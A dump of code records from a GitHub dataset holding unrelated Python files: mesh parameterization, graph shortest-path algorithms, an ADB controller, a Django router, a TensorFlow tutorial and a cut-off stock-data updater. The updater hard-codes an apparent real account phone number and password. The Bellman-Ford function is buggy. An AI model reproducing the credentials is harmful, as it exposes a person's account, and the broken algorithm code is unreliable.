(-(scale / 2) + scale * (new_ratio / 0.25), scale / 2)\n elif new_ratio < 0.5:\n vpos = (scale / 2, (scale / 2) - scale * ((new_ratio - 0.25) / 0.25))\n elif new_ratio < 0.75:\n vpos = ((scale / 2) - scale * ((new_ratio - 0.5) / 0.25), -scale / 2)\n else:\n vpos = (-scale / 2, -(scale / 2) + scale * ((new_ratio - 0.75) / 0.25))\n if _first > 0:\n _first -= 1\n print('bound:', bnd, 'vpos:', vpos)\n f_B = np.append(f_B, [vpos], axis=0)\n last_v = bnd\n print('last bound:', last_v, 'vpos:', f_B[-1])\n print('first bound:', bnds[0])\n return f_B, bnds\n\ndef mapping_1_boundary(msh: Trimesh, sub_bnds: list, last_idx: int, scale: float) -> list:\n '''\n 将边缘分为四部分,映射其中一部分,都映射到(-scale/2, scale/2) 和 (scale/2, scale/2)之间\n 之后再旋转即可拼凑出四部分映射\n '''\n sub_bnds = np.append(sub_bnds, last_idx)\n bnd_size = len(sub_bnds)\n lengths = [mesh_vert_dist(msh, *sub_bnds[i:i+2]) for i in range(bnd_size - 1)]\n # lengths normalized to 0~1\n lengths = np.array(lengths) / sum(lengths)\n # lengths accumulated\n _acc_lens = np.cumsum(lengths)\n _acc_lens -= _acc_lens[0]\n # mapping lengths to (-scale/2, scale/2) and (scale/2, scale/2)\n _x = _acc_lens * scale - scale / 2\n _y = np.ones(bnd_size) * scale / 2\n # combine x and y zip to list\n return np.array(list(zip(_x, _y)))\n\ndef __rotate_90(pnts: list, times: int) -> list:\n # pnts is ndarray shape (n, 2)\n # rotate theta angle around (0, 0)\n rot_mat = np.array([[0, -1], [1, 0]])\n for _ in range(times):\n pnts = np.dot(pnts, rot_mat)\n return pnts\n\n'''\n*** initial weights ***\n'''\ndef initialize_weights(msh: Trimesh, inn_verts: list, bnd_verts: list) -> csc_matrix:\n # sub function\n def weights_for_edge(edge: list) -> float:\n adj_list_s = msh.vertex_neighbors[edge[0]]\n adj_list_b = msh.vertex_neighbors[edge[1]]\n adj_vts = npi.intersection(adj_list_s, adj_list_b)\n # assert len(adj_vts) == 2, 'not a manifold'\n # compute cotangent weight of edge\n ang1 = mesh_vert_angle(msh, adj_vts[0], *edge)\n ang2 = mesh_vert_angle(msh, adj_vts[1], *edge)\n _w = (math_cot(ang1) + math_cot(ang2)) / 2\n return -_w\n\n # sparse matrix index\n sp_row = np.array([], dtype=int)\n sp_col = np.array([], dtype=int)\n sp_data = np.array([], dtype=float)\n mtx_diag = np.zeros(len(msh.vertices))\n # generate\n _weights = list(map(weights_for_edge, tqdm(msh.face_adjacency_edges, desc='generating weights')))\n # update diag\n for idx, edge in enumerate(msh.face_adjacency_edges):\n mtx_diag[edge[0]] += -_weights[idx]\n mtx_diag[edge[1]] += -_weights[idx]\n \n # transpose indices\n _indices = msh.face_adjacency_edges.T\n sp_row = np.hstack([sp_row, _indices[0], _indices[1]])\n sp_col = np.hstack([sp_col, _indices[1], _indices[0]])\n sp_data = np.hstack([sp_data, _weights, _weights])\n\n # handle diag sparse index\n # all vertices in msh with order {INNER, BOUND}\n sp_diag_index = np.append(inn_verts, bnd_verts)\n sp_row = np.hstack([sp_row, sp_diag_index])\n sp_col = np.hstack([sp_col, sp_diag_index])\n sp_diag_data = [mtx_diag[v] for v in sp_diag_index]\n sp_data = np.hstack([sp_data, sp_diag_data])\n\n sp_weights = csc_matrix((sp_data, (sp_row, sp_col)), dtype=float)\n return sp_weights\n\n\n'''\nsplit sp_weights with sp_weights_II and sp_weights_IB\nand solve equation:\n sp_weights_II * f_I = -sp_weights_IB * f_B\n'''\ndef solve_equation(sp_weights: csc_matrix, f_B: list, inn_verts: list, bnd_verts: list) -> list:\n _mid = sp_weights[inn_verts, ...]\n sp_weights_II = _mid[..., inn_verts]\n sp_weights_IB = _mid[..., bnd_verts]\n\n assert sp_weights_IB.shape[1] == len(f_B), f'L_IB({sp_weights.shape[1]}) * f_B({len(f_B)}) illegal'\n\n f_I = spsolve(sp_weights_II, -sp_weights_IB * f_B)\n return f_I\n\n\n'''\nbuild param mesh by inverse mapping\nassume Z=0 in param mesh\n'''\ndef build_param_mesh(msh: Trimesh, inn_verts: list, bnd_verts: list, f_I: list, f_B: list) -> Trimesh:\n len_inn, len_bnd = len(inn_verts), len(bnd_verts)\n param_bnd_verts = [v + len_inn for v in range(len_bnd)]\n inv_mapping = dict(zip(bnd_verts, param_bnd_verts))\n param_inn_verts = [v for v in range(len_inn)]\n inv_mapping.update(zip(inn_verts, param_inn_verts))\n param_tot = np.append(f_I, f_B, axis=0)\n # param_tot add new column Z=0\n param_tot = np.hstack([param_tot, np.zeros((len(param_tot), 1))])\n\n param_mesh = Trimesh(\n vertices=[param_tot[inv_mapping[i]] for i in range(len_inn + len_bnd)],\n faces=deepcopy(msh.faces)\n )\n print('check: ', param_mesh.vertices[bnd_verts[0]], 'for', bnd_verts[0])\n param_mesh.remove_degenerate_faces()\n param_mesh.remove_duplicate_faces()\n param_mesh.remove_infinite_values()\n return param_mesh\n\ndef build_str_mesh_custom(uns_mesh: Trimesh, param_mesh: Trimesh, sample_pnts: list, scale: float=2.) -> Trimesh:\n square_nums = len(sample_pnts)\n assert square_nums > 4, 'sample points illegal'\n sample_nums = int(square_nums ** 0.5)\n # flatten numpy elements to list will accelerate in cycle\n flt_faces = param_mesh.faces.tolist()\n flt_area_faces = param_mesh.area_faces.tolist()\n str_mesh = Trimesh()\n\n sample_trias = param_mesh.nearest.on_surface(sample_pnts)\n sample_trias = sample_trias[2].tolist()\n spot_trias = list(map(lambda tri: flt_faces[tri], sample_trias))\n vijk_areas = [\n [\n mesh_trias_area(\n sample_pnts[idx],\n param_mesh.vertices[spot_trias[idx][1]],\n param_mesh.vertices[spot_trias[idx][2]]\n ),\n mesh_trias_area(\n param_mesh.vertices[spot_trias[idx][0]],\n sample_pnts[idx],\n param_mesh.vertices[spot_trias[idx][2]]\n ),\n mesh_trias_area(\n param_mesh.vertices[spot_trias[idx][0]],\n param_mesh.vertices[spot_trias[idx][1]],\n sample_pnts[idx],\n )\n ]\n for idx in range(square_nums)\n ]\n\n str_pnts = [\n (\n vijk_areas[idx][0] * uns_mesh.vertices[spot_trias[idx][0]] +\n vijk_areas[idx][1] * uns_mesh.vertices[spot_trias[idx][1]] +\n vijk_areas[idx][2] * uns_mesh.vertices[spot_trias[idx][2]]\n ) / flt_area_faces[sample_trias[idx]]\n for idx in range(square_nums)\n ]\n\n half_trias1 = [\n [ir * sample_nums + ic, ir * sample_nums + ic - sample_nums, ir * sample_nums + ic - 1]\n for ir in range(1, sample_nums) for ic in range(1, sample_nums)\n ]\n half_trias2 = [\n [ir * sample_nums + ic - 1, ir * sample_nums + ic - sample_nums, ir * sample_nums + ic - sample_nums - 1]\n for ir in range(1, sample_nums) for ic in range(1, sample_nums)\n ]\n\n str_mesh.vertices = str_pnts\n str_mesh.faces = np.vstack([half_trias1, half_trias2])\n\n str_mesh.remove_infinite_values()\n str_mesh.remove_degenerate_faces()\n str_mesh.remove_unreferenced_vertices()\n str_mesh.fill_holes()\n str_mesh.fix_normals()\n\n return str_mesh\n\n'''\nbuild str mesh by sample vertices on param mesh\n'''\ndef build_str_mesh(uns_mesh: Trimesh, param_mesh: Trimesh, sample_nums: int=50, scale: float=2.) -> Trimesh:\n assert sample_nums > 2, 'sample_nums too small'\n # flatten numpy elements to list will accelerate in cycle\n sample_pnts = []\n for ic in range(sample_nums):\n for ir in range(sample_nums):\n # sample_pnts.append([scale * ic / (sample_nums - 1) - scale / 2,scale * ir / (sample_nums - 1) - scale / 2, 0.])\n sample_pnts.append([-scale * ir / (sample_nums - 1) + scale / 2, -scale * ic / (sample_nums - 1) + scale / 2, 0.])\n print(sample_pnts[:3])\n # sample_pnts = [\n # [scale * ir / (sample_nums - 1) - scale / 2, -scale * ic / (sample_nums - 1) + scale / 2, 0.]\n # for ic in range(sample_nums) for ir in range(sample_nums)\n # ]\n return build_str_mesh_custom(uns_mesh, param_mesh, sample_pnts, scale)\n","repo_name":"hx-w/RenderLab","sub_path":"backend/remesh_backend/param.py","file_name":"param.py","file_ext":"py","file_size_in_byte":11103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39892327474","text":"arr = []\n\nfor i in range(12, 999999):\n\tsum_j = 0\n\tfor j in str(i):\n\t\tsum_j += int(j) ** 5\n\tif i == sum_j:\n\t\tarr.append(i)\n\t\t\nprint(sum(arr))\n","repo_name":"MikhailGusarov/ProjectEuler","sub_path":"Problem 30.py","file_name":"Problem 30.py","file_ext":"py","file_size_in_byte":141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22980846237","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nimport util\n\nimport logistic_regression\n\ndef max_score():\n return 4\n\ndef timeout():\n return 60\n\ndef test():\n\n figures_directory = 'figures'\n\n os.makedirs(figures_directory, exist_ok=True)\n\n X, y = logistic_regression.setup_data()\n\n lambda_values = [0.1, 2]\n alpha_values = [0.5, 0.2]\n\n w0 = np.array([[7.0], [1.5]])\n num_iter = 10\n\n colors = ['green', 'darkorchid']\n\n # Solution values\n expected_w_list = [ (7.000,1.500), (-0.499,-0.628), (-0.020,0.777), (-0.139,0.180), (-0.122,0.310), (-0.121,0.315), (-0.121,0.315), (-0.121,0.315), (-0.121,0.315), (-0.121,0.315), (-0.121,0.315) ]\n\n for lamb, alpha in zip(lambda_values, alpha_values):\n\n util.plot_objective_contours(X, y, lamb, title='Newton\\'s Method vs. Gradient Descent, lambda={}'.format(lamb), colors='gray',\n show_labels=False, new_figure=True, show_figure=False, save_filename=None)\n\n gd_w_list = logistic_regression.gradient_descent(X, y, lamb, alpha, w0, num_iter)\n util.plot_optimization_path(gd_w_list, color=colors[0], label='Gradient Descent')\n\n actual_w_list = logistic_regression.newtons_method(X, y, lamb, w0, num_iter)\n\n\n util.plot_optimization_path(actual_w_list, color=colors[1], label='Newton\\'s Method')\n\n plt.xlim(-8, 8)\n plt.ylim(-8, 8)\n plt.legend(fontsize=util.get_font_size())\n\n filename = '{}/newtons_method_lambda_{:.1f}.png'.format(figures_directory, lamb)\n filename = filename.replace('.', '_', 1)\n plt.savefig(filename)\n\n\n for i in range(num_iter+1):\n assert abs(actual_w_list[i][0,0] - expected_w_list[i][0]) < 0.01 , 'Incorrect weight value found for iter={}, w[0]. Expected w={}, found w={}'.format(i, expected_w_list[i], actual_w_list[i])\n assert abs(actual_w_list[i][1,0] - expected_w_list[i][1]) < 0.01 , 'Incorrect weight value found for iter={}, w[1]. Expected w={}, found w={}'.format(i, expected_w_list[i], actual_w_list[i])\n \n\n test_score = max_score()\n test_output = 'PASS\\n'\n\n return test_score, test_output\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"Dahoas/ML","sub_path":"hw4_programming/hw4/test_cases/Q3/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20806726256","text":"import pandas as pd\nimport os\n\nDATA_PATH = f\".\\dane\"\nSERIES_FILES = ['series1.csv', 'series2.csv', 'series3.csv']\n\n\ndef load_all_series():\n dfs = []\n for idx, file in enumerate(SERIES_FILES):\n filepath = os.path.join(DATA_PATH, file)\n assert os.path.exists(filepath)\n df = pd.read_csv(filepath).rename(columns={'x': f'x_series_{idx}'})\n dfs.append(df)\n df = pd.concat(dfs, axis=1)\n return df\n\ndef generator(series_number): # 1 2 3 as series number\n assert int(series_number) in [1,2,3]\n filename = SERIES_FILES[series_number-1]\n print(filename)\n filepath = os.path.join(DATA_PATH,str(filename))\n assert os.path.exists(filepath)\n with open(filepath, 'r') as f:\n for line in f:\n if 'x' in line: #first line has column name \"x\".\n pass\n else:\n yield float(line)\n yield None","repo_name":"BlonskiP/PWR-Datascience-projects-exercises","sub_path":"Complex data analysis/kt-assignment-3-BlonskiP/src/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26611950802","text":"if __name__ != '__main__':\n\tsys.exit(0)\n\nimport os.path, time, sys, glob, re\n\nbasepath = os.path.dirname(__file__)\nfile_name = os.path.abspath(os.path.join(basepath, sys.argv[1]))\nf = open(file_name,'r')\na = [' type=\"unfinished\"']\nlst = []\nfor line in f:\n\tfor word in a:\n\t\tif word in line:\n\t\t\tline = line.replace(word,'')\n\tlst.append(line)\nf.close()\nf = open(file_name,'w')\nfor line in lst:\n\tf.write(line)\nf.close()\n\nsys.exit(0)","repo_name":"mailru/icqdesktop.deprecated","sub_path":"gui/translations/update_mark_finished.py","file_name":"update_mark_finished.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":445,"dataset":"github-code","pt":"53"} +{"seq_id":"13272897100","text":"from collections import defaultdict\n\nclass Graph():\n def __init__(self):\n \"\"\"\n self.edges is a dict of all possible next nodes\n e.g. {'X': ['A', 'B', 'C', 'E'], ...}\n self.weights has all the weights between two nodes,\n with the two nodes as a tuple as the key\n e.g. {('X', 'A'): 7, ('X', 'B'): 2, ...}\n \"\"\"\n self.edges = defaultdict(list)\n self.weights = {}\n \n def add_edge(self, from_node, to_node, weight):\n # Note: assumes edges are bi-directional\n self.edges[from_node].append(to_node)\n self.edges[to_node].append(from_node)\n self.weights[(from_node, to_node)] = weight\n self.weights[(to_node, from_node)] = weight\n\n\ndef bellmanFord(graph,inintal,end):\n #CONVERT TO PROPER DS FOR ALGORITHM\n #number of vertices\n V=len(graph.weights)\n map_dict={}\n bel_graph=[]\n for idx,key in enumerate(graph.edges.keys()):\n map_dict[key]=idx\n src=map_dict[inintal]\n dst=map_dict[end]\n path=[]\n for edge in graph.weights:\n bel_graph.append([map_dict[edge[0]], map_dict[edge[1]], edge[(0, 1)]])\n\n # init all distances from source to all as INFINITE\n dist = [float(\"Inf\")] * V\n dist[src] = 0\n # relax all edges |V|-1 times.\n for i in range(V- 1):\n # update dist value and parent index of adjacent values of picked vertex.\n # consider those which are still in queue.\n for u, v, w in bel_graph:\n if dist[u] != float(\"Inf\") and dist[u] + w < dist[v]:\n dist[v] = dist[u] + w\n path.append()\n # check for negative weight cycles. If path obtained from above step (shortest distances)\n # is shorter, there's a cycle. So quit.\n for u, v, w in bel_graph:\n if dist[u] != float(\"Inf\") and dist[u] + w < dist[v]:\n print(\"Negative Cycles !\")\n return\n #convert to normal graph\n\n # print distances\ndef dijsktra(graph, initial, end):\n # shortest paths is a dict of nodes\n # whose value is a tuple of (previous node, weight)\n shortest_paths = {initial: (None, 0)}\n current_node = initial\n visited = set()\n total_weight=0\n while current_node != end:\n visited.add(current_node)\n destinations = graph.edges[current_node]\n weight_to_current_node = shortest_paths[current_node][1]\n\n for next_node in destinations:\n weight = graph.weights[(current_node, next_node)] + weight_to_current_node\n if next_node not in shortest_paths:\n shortest_paths[next_node] = (current_node, weight)\n else:\n current_shortest_weight = shortest_paths[next_node][1]\n if current_shortest_weight > weight:\n shortest_paths[next_node] = (current_node, weight)\n \n next_destinations = {node: shortest_paths[node] for node in shortest_paths if node not in visited}\n if not next_destinations:\n return \"Route Not Possible\"\n # next node is the destination with the lowest weight\n current_node = min(next_destinations, key=lambda k: next_destinations[k][1])\n \n # Work back through destinations in shortest path\n path = []\n while current_node is not None:\n path.append(current_node)\n next_node = shortest_paths[current_node][0]\n current_node = next_node\n # Reverse path\n path = path[::-1]\n for idx in range(len(path)-1):\n total_weight+=graph.weights[(path[idx],path[idx+1])]\n return path,total_weight","repo_name":"Ryuodan/Network-Routering-Simulation","sub_path":"algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17244084985","text":"import logging\nimport socket\nimport numpy as np\nimport cv2\n\nimport config\nfrom ppadb.client import Client as AdbClient\n\nlogger = logging.getLogger(__name__)\n\n\nclass ADBSession():\n def __init__(self, server, serial=None):\n self.server = server\n self.client = AdbClient(host=self.server[0], port=self.server[1])\n\n if self.client is not None:\n logger.debug(f\"Create to adb client succssfully! {self.server[0]}:{self.server[1]}\")\n\n devices = self.client.devices()\n if len(devices) > 0:\n self.device = devices[0]\n logger.debug(f\"{len(devices)} devices found! Connect the first one: {self.device.serial}\")\n else:\n logger.error(\"No device found\")\n\n def shell_raw(self, cmd):\n # overwrite the shell function so that it returns raw byte instead of utf-8 decoded\n conn = self.device.create_connection(timeout=None)\n cmd = \"exec:{}\".format(cmd)\n conn.send(cmd)\n result = conn.read_all()\n conn.close()\n return result\n\n def get_screen_size(self):\n image = self.get_screenshot()\n self.width, self.height, self.channel = image.shape\n logger.debug(f\"Screen size is ({self.height}, {self.width}, {self.channel})\")\n\n def exec_cmd(self, cmd):\n \"\"\" run command in adb shell \"\"\"\n return self.device.shell(cmd)\n\n def list_devices(self):\n devices = self.client.devices()\n for device in devices:\n print(device.serial)\n\n def get_screenshot(self):\n # take screenshot and convert to cv2 image\n data = self.shell_raw(\"screencap -p\")\n np_image = np.array(data)\n image = cv2.imdecode(np_image, 1)\n logger.debug(f\"Get screenshot of size {image.shape}\")\n return image\n\n def tap_screen(self, coord): # coord[0] = x, coord[1] = y\n command = f\"input tap {coord[0]} {coord[1]}\"\n self.exec_cmd(command)\n logger.debug(f\"Tap screen: ({coord[0]},{coord[1]})\")\n \n def touch_swipe(self, origin, movement, duration=None):\n x1, y1, x2, y2 = origin[0], origin[1], origin[0] + movement[0], origin[1] + movement[1]\n logger.debug(f\"swipe from:({x1},{y1}); offset: dX:{movement[0]}, dy:{movement[1]}\")\n command = \"input swipe {} {} {} {} \".format(x1, y1, x2, y2)\n if duration is not None:\n command += str(int(duration))\n self.exec_cmd(command)","repo_name":"Gavincrz/arknights_remote","sub_path":"localPC/connector/ADBSession.py","file_name":"ADBSession.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29355234218","text":"import os\nimport pandas as pd\n\n_file_name = os.environ.get('FILE_NAME', '../../../data/conversations_prod.xlsx')\n\nTIME_CHAT_GPT_USED = 1677063600\n\nclass GlobalStore:\n def __init__(self):\n df = pd.read_excel(_file_name)\n df = df[df.testphase != 0] # Testphase 0 is ignored because it consists mainly of test conversations\n df.reset_index(drop=True, inplace=True)\n self.df = df\n\n def get_data(self, filter_value):\n if filter_value == 0:\n return self.df\n else:\n df_filtered = self.df[self.df.testphase == filter_value]\n df_filtered.reset_index(drop=True, inplace=True)\n return df_filtered\n\n def set_data(self, new_df):\n self.df = new_df\n\n\nglobal_store = GlobalStore()\n","repo_name":"climate-change-bot/analytics","sub_path":"src/climate_change_bot/analytics/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72593468008","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('home/create_post/', views.create_post, name=\"create_post\"),\n path('', views.home, name='home'),\n path('home/', views.home, name='home'),\n path('post//', views.post_detail, name=\"post_detail\"),\n path(\"post//delete\", views.PostDelete.as_view(), name=\"posts_delete\"),\n path('songs/create', views.SongCreate.as_view(), name=\"songs_create\"),\n path(\"songs//\", views.song_detail, name=\"songs_detail\"),\n path(\"songs//update\", views.SongUpdate.as_view(), name=\"songs_update\"),\n path(\"songs//delete\", views.SongDelete.as_view(), name=\"songs_delete\"),\n path(\"songs//assoc_gear//\", views.assoc_gear, name=\"assoc_gear\"),\n path(\"songs//unassoc_gear//\", views.unassoc_gear, name=\"unassoc_gear\"),\n path('songs', views.songs_index, name='index'),\n path(\"gear//\", views.GearDetail.as_view(), name=\"gears_detail\"),\n path(\"gear/create\", views.GearCreate.as_view(), name=\"gears_create\"),\n path(\"gear/\", views.GearList.as_view(), name=\"gears_index\"),\n path('accounts/signup/', views.signup, name='signup'),\n]\n","repo_name":"ShayRdev/Sampology","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11902027371","text":"import tensorflow as tf\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nsession = tf.Session()\r\n'''\r\n#Constants\r\ncons_1 = tf.constant(value = [[1.0,2.0]],\r\n dtype = tf.float32,\r\n name = 'cons_1')\r\n\r\ncons_2 = tf.constant(value = [[3.0,4.0]],\r\n dtype = tf.float32,\r\n name = 'cons_1')\r\n\r\nsession = tf.Session()\r\nprint(session.run(cons_1),session.run(cons_2))\r\n\r\n\r\n#Variables\r\nvar_1 = tf.Variable(initial_value=[1.0],\r\n trainable=True,\r\n dtype=tf.float32) # if true model can change its value if False then its can't\r\n\r\ninit = tf.global_variables_initializer() # we have to call this function to initialize the variable value\r\nsession.run(init)\r\nprint(session.run(var_1))\r\n\r\nvar_2 = var_1.assign(value=[2.0])\r\nprint(session.run(var_2))\r\n\r\n# Placeholder\r\nplaceholder_1 = tf.placeholder(dtype=tf.float32,\r\n shape = (1,4),\r\n name='placeholder_1')\r\n\r\nprint(placeholder_1)\r\nprint(session.run(fetches=placeholder_1,feed_dict={placeholder_1:[[1.0,2.0,3.0,4.0]]}))'''\r\n\r\n# Operation Node\r\ncons_1 = tf.constant(value=[1.0])\r\ncons_2 = tf.constant(value=[2.0])\r\nplaceholder_1 = tf.placeholder(dtype=tf.float32)\r\n#result = cons_1 + cons_2\r\nresult = tf.add(x=placeholder_1,y=cons_2,name='result')\r\n#print(session.run(fetches=result,feed_dict={placeholder_1:[2.0]}))\r\n\r\n# Y = m*x + c\r\n\r\nm = tf.constant(value=[2.0],\r\n dtype=tf.float32)\r\nc = tf.constant(value=[3.0],\r\n dtype=tf.float32)\r\nx = tf.placeholder(dtype=tf.float32)\r\n\r\n#y = m*x + c\r\n\r\nmult = tf.multiply(x=m,y=x,name='multiply')\r\n\r\ny = tf.add(x=mult,y=c)\r\n\r\nprint(session.run(fetches=y,feed_dict={x:[3.0]}))\r\n\r\n","repo_name":"Arup276/365Days_Challenge","sub_path":"42_Day/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70092608810","text":"import os.path\nimport app_state\nimport numpy as np\nfrom pydub.playback import play\nfrom pydub import AudioSegment\nfrom torch.cuda import is_available\n\nAPP_NAME = \"WeeaBlind\"\ntest_video_name = \"./output/download.webm\"\ndefault_sample_path = \"./output/sample.wav\"\ntest_start_time = 94\ntest_end_time = 1324\ngpu_detected = is_available()\n\ndef create_output_dir():\n\tpath = './output/files'\n\tif not os.path.exists(path):\n\t\tos.makedirs(path)\n\ndef get_output_path(input, suffix, prefix='', path=''):\n\tfilename = os.path.basename(input)\n\tfilename_without_extension = os.path.splitext(filename)[0]\n\treturn os.path.join(os.path.dirname(os.path.abspath(__file__)), 'output', path, f\"{prefix}{filename_without_extension}{suffix}\")\n\ndef timecode_to_seconds(timecode):\n\tparts = list(map(float, timecode.split(':')))\n\tseconds = parts[-1]\n\tif len(parts) > 1:\n\t\tseconds += parts[-2] * 60\n\tif len(parts) > 2:\n\t\tseconds += parts[-3] * 3600\n\treturn seconds\n\ndef seconds_to_timecode(seconds):\n\thours = int(seconds // 3600)\n\tminutes = int((seconds % 3600) // 60)\n\tseconds = seconds % 60\n\ttimecode = \"\"\n\tif hours:\n\t\ttimecode += f\"{hours}:\"\n\tif minutes:\n\t\ttimecode += f\"{minutes}:\" \n\ttimecode = f\"{timecode}{seconds:05.2f}\"\n\treturn timecode\n\n# Finds the closest element in an arry to the given value\ndef find_nearest(array, value):\n\treturn (np.abs(np.asarray(array) - value)).argmin()\n\ndef sampleVoice(text, output=default_sample_path):\n\tplay(AudioSegment.from_file(app_state.sample_speaker.speak(text, output)))\n\nsnippet_export_path = get_output_path(\"video_snippet\", \"wav\")","repo_name":"lonelyuniverse/Itadub","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"211817366","text":"# coding=utf8\r\nimport os\r\nimport time\r\nimport datetime as dt\r\n\r\nimport scipy.io as scio\r\nimport h5py\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom gmsdk import md\r\nfrom WindPy import w\r\n\r\n\r\n\r\n\r\ndef read_cell(h5fl,field):\r\n return [''.join([chr(c) for c in h5fl[cl]]) for cl in h5fl[field][0]]\r\n\r\ndef updatePal(palPath=None):\r\n start = time.time()\r\n\r\n md.init('18201141877', 'Wqxl7309')\r\n if not w.isconnected():\r\n w.start()\r\n\r\n palPath = r'E:\\bqfcts\\bqfcts\\data\\Paltest' if palPath is None else palPath\r\n tempFilePath = os.path.join(palPath,'temp_files')\r\n if not os.path.exists(tempFilePath):\r\n os.mkdir(tempFilePath)\r\n matName = 'data_20150701_now.mat'\r\n\r\n savedPal = h5py.File(os.path.join(palPath,matName))\r\n # print(read_cell(savedPal,'sec_names'))\r\n nextTrd = dt.datetime.strptime(str(int(savedPal['nexttrd'][0][0])),'%Y%m%d')\r\n nextTrdStr = nextTrd.strftime('%Y-%m-%d')\r\n updateTime = dt.datetime(nextTrd.year,nextTrd.month,nextTrd.day,15,30,0)\r\n if updateTime > dt.datetime.now():\r\n print('not update time yet')\r\n return\r\n else:\r\n availableDateStr = md.get_last_dailybars('SHSE.000001')[0].strtime[:10]\r\n if int(availableDateStr.replace('-','')) <= int(nextTrdStr.replace('-','')):\r\n print('new data not avaliable yet')\r\n return\r\n else:\r\n print('will update from {0} to {1}'.format(nextTrdStr,availableDateStr))\r\n\r\n betweenDays = [tdt.strtime[:10] for tdt in md.get_calendar('SHSE',nextTrdStr,availableDateStr)]\r\n if nextTrdStr!=availableDateStr: # 避免同一日期重复\r\n betweenDays.append(availableDateStr)\r\n betweenDaysNumber = [int(tdt.replace('-','')) for tdt in betweenDays]\r\n newDateNum = len(betweenDaysNumber)\r\n\r\n # 更新前 先备份数据\r\n backupPath = os.path.join(palPath,'backup')\r\n cpResult = os.system(r'COPY {0} {1} /Y'.format(os.path.join(palPath,matName),os.path.join(backupPath,matName)))\r\n assert cpResult==0,'backup failed'\r\n\r\n gmDateFmt = 'yyyy-mm-dd'\r\n\r\n # update indice\r\n indiceNames = ['sh','hs300','zz500','sz50']\r\n indiceCodes = ['000001','000300','000905','000016']\r\n symbols = ','.join(['SHSE.{}'.format(sbl) for sbl in indiceCodes])\r\n indiceBars = md.get_dailybars(symbols,nextTrdStr,availableDateStr)\r\n for dumi,idx in enumerate(indiceNames):\r\n bars = indiceBars[dumi::4]\r\n idxret = np.array([bar.close for bar in bars])/np.array([bar.pre_close for bar in bars]) - 1\r\n idxArray = np.array([betweenDaysNumber,\r\n [bar.open for bar in bars],\r\n [bar.high for bar in bars],\r\n [bar.low for bar in bars],\r\n [bar.close for bar in bars],\r\n [bar.volume for bar in bars],\r\n [bar.amount for bar in bars],\r\n idxret\r\n ])\r\n # newIndex = np.column_stack([savedPal['index_{}'.format(idx)][:], idxArray])\r\n pd.DataFrame(np.transpose(idxArray)).to_csv(os.path.join(tempFilePath,'index_{}.csv'.format(idx)),index=False,header=False)\r\n\r\n # update stock info\r\n nCut = savedPal['N_cut'][0][0] # 6000\r\n nEnd = savedPal['N_end'][0][0] # last end date id ex.6732\r\n stockNames = read_cell(savedPal, 'stockname')\r\n savedStkcdsGM = ['.'.join([stk[-2:]+'SE',stk[:6]]) for stk in stockNames]\r\n savedStkNum = len(stockNames)\r\n listedStkcdsWind = w.wset('sectorconstituent','date={};sectorid=a001010100000000'.format(availableDateStr)).Data[1]\r\n newStkcdsWind = sorted(list(set(listedStkcdsWind) - set(stockNames)))\r\n if newStkcdsWind:\r\n stockNames.extend( newStkcdsWind )\r\n newStkIpos = [int(tdt.strftime('%Y%m%d')) for tdt in w.wss(newStkcdsWind, 'ipo_date').Data[0]]\r\n newIpoIds = [(w.tdayscount(nextTrd,str(ipo)).Data[0][0]+nEnd) for ipo in newStkIpos]\r\n newStockip = pd.DataFrame([[int(newStkcdsWind[dumi][:6]), newStkIpos[dumi], newIpoIds[dumi],0,0,0,0,0] for dumi in range(len(newStkcdsWind))])\r\n newStockip.to_csv( os.path.join(tempFilePath,'stockip.csv'),index=False,header=False )\r\n else:\r\n pd.DataFrame([]).to_csv(os.path.join(tempFilePath, 'stockip.csv'), index=False, header=False)\r\n newStkcdsGm = ['.'.join([stk[-2:]+'SE',stk[:6]]) for stk in newStkcdsWind]\r\n allStkcdsGM = savedStkcdsGM + newStkcdsGm # 全体股票包含已退市 与pal行数相同\r\n # allSecNames = pd.DataFrame(w.wss(stockNames,'sec_name').Data[0])\r\n allInstruments = md.get_instruments('SZSE', 1, 0) + md.get_instruments('SHSE', 1, 0)\r\n allInstrumentsDF = pd.DataFrame([[inds.symbol, inds.sec_name] for inds in allInstruments],columns=['symbol','sec_name']).set_index('symbol')\r\n allSecNames = allInstrumentsDF.loc[allStkcdsGM,'sec_name']\r\n allSecNames.to_csv( os.path.join(tempFilePath, 'sec_names.csv'), index=False, header=False )\r\n pd.DataFrame(newStkcdsWind).to_csv( os.path.join(tempFilePath, 'stockname.csv'), index=False, header=False )\r\n\r\n # update trade info\r\n pages = ['date','open','high','low','close','volume','amount','pctchg','flow_a_share','total_share','adjfct','adjprc','isst']\r\n newPal = {}\r\n for page in pages:\r\n 